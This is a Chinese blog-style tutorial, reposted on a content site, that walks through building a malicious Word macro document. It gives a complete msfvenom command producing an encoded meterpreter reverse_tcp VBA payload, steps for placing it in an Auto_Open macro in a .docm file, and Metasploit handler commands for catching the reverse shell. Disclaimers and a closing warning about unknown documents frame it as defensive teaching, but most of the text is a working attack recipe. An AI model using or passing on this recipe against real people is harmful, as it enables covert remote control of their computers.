admin管理员组文章数量:1592253
作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途
Word宏添加木马病毒
- 前言
- 创建木马word
- 1.生成木马代码
- 2.创建word文件
- 3.打开msf监听
- 注意
- ==本文只是普及防木马和信息防御教学,切勿用于其他用途。==
前言
我们知道windows和inux的软件等等很容易被植入木马或者病毒。
但你们知道word和excel文件依旧可以植入木马吗?
office有个功能叫做宏,通常情况下是关闭状态,当有宏操作时候会提示你已经禁止了宏,问你咋整
这情况普通人绝对遇到过,当你打开一个有木马的word文档时候,如果你的office设置自动运行宏或者你无意识点击了启用宏,那么你十有八九电脑被控制了。就算你关闭了程序,对方依旧能够控制你电脑(老可怕了)。
创建木马word
1.生成木马代码
(只是普及知识,不能干坏事啊)
我们需要一台kali,能连通,能运行metasploit就行(简称msf)
msf有个命令msfvenom,这个命令是用来制作各种后台木马的,利用这个命令创建一个vba的代码加入到word宏中。
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.131 LPOST=4444 -b "\x00" -e x86/shikata_ga_nai -i 9 -f vba-exe
命令具体内容就不解释了,懂得都懂。(不懂再来问我)
这个命令会生成两种代码
第一种宏代码需要添加到宏中
另一部分16进制代码添加到文本当中
我先把生成的代码复制出来。
2.创建word文件
创建word文件(word2007版本以上的都行),新建的word格式是docx,但这种格式添加的宏经我测试发给别人不管用,所以先另存为另一个格式docm
然后在123.docm文件加入宏,在功能栏视图->宏,点开就行
(你们打开可能和我显示不一样,但操作相同)
宏名随便填,最好英文格式,宏的位置选择你的这个文档,然后创建。
选择所有的内容删除,然后添加生成的宏代码Sub Auto_Open()…End Sub然后保存。
在word文本中添加生成的16进制代码,保存即可。
3.打开msf监听
这里就快速带过了啊
msfconsole
use exploit/multi/handler
set LHOST 192.168.1.131
set LPORT 4444
set payload windows/meterpreter/reverse_tcp
run
开始监听
然后用打开已经弄好的word文档。
当你一点击运行宏,你自己感受不到,但kali已经把你系统控制了(可以为所欲为了)。
就算你关闭word文档,控制仍然存在,除非你关机。
同理excel也能实现此功能哦
注意
本次实验只是简单的操作一下
提醒大家不要随意打开不知名的word文档,这种简单的操作虽然吓人,但你电脑只要安装了杀毒软件,基本就没有危险。
但是如果大佬们进行了免杀操作,这可就说不准了。
记住一点就是不要随意下载不知名的网站,不要让自己的电脑裸奔,看到报毒不要存在侥幸心理点开。
本文只是普及防木马和信息防御教学,切勿用于其他用途。
版权声明:本文标题:一个Word无形中控制你的电脑 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dongtai/1728124591a1146247.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论